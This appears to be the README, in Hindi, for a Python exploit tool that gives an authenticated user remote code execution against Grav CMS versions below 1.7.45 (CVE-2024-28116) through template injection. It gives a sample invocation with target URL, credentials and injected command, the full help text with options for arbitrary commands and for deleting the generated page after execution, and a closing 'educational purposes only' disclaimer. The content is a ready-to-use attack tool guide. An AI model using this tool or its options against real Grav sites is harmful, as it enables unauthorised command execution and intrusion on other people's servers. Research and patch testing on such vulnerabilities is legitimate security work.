
Grav CMS (1.7.45 से नीचे के संस्करण) के विरुद्ध शोषण जो एक प्रमाणित उपयोगकर्ता के लिए दूरस्थ कोड निष्पादन (Remote Code Execution) की अनुमति देता है - CVE-2024-28116
यह कोड Graver Github रिपॉजिटरी से अनुकूलित है, जिसमें इस वीडियो के आधार पर कुछ सुधार किए गए हैं।
Grav CMS ( 1.7.45 से नीचे के संस्करणों के लिए) के विरुद्ध शोषण, SSTI + RCE कमजोरियों पर आधारित, जिसे CVE-2024-28116 के रूप में चिह्नित किया गया है। यह स्क्रिप्ट मूल रूप से कमजोरी वाला एक पेज बनाती है, इसे निष्पादित करती है और अंत में निष्पादन के बाद पेज को हटा देती है।
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'
सहायता संदेश:
$ python3 Grav_CMS_RCE.py -h
usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]
Grav CMS RCE (Authenticated).
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL where Grav CMS is running. Example: http://10.10.10.10
-P PORT, --port PORT Port running Grav CMS. Default: 80
-u USERNAME, --username USERNAME
Username to authenticate in Grav CMS
-p PASSWORD, --password PASSWORD
Password for the user in Grav CMS.
-x COMMAND, --command COMMAND
Command to inject/run.
--no-delete-file Do NOT delete the generated files. Useful to check command execution output.
--panel-route PANEL_ROUTE
Admin Panel route in Grav CMS. Default: /admin
--show-warnings Show warnings (if there are).
यदि किसी कारण से हम जनरेट की गई फ़ाइलों को हटाना नहीं चाहते हैं, तो हम --no-delete-file फ्लैग का उपयोग कर सकते हैं, स्क्रिप्ट द्वारा बताए गए पेज पर जाएँ और कमांड आउटपुट पढ़ सकते हैं।
CVE-2024-28116/इस शोषण के बारे में अधिक जानकारी:
Grav CMS v1.7.44 - Admin 1.10.44 पर परीक्षण किया गया।इस रिपॉजिटरी का मालिक इस सॉफ़्टवेयर के उपयोग के लिए जिम्मेदार नहीं है। इसे केवल शैक्षिक उद्देश्यों के लिए बनाया गया था।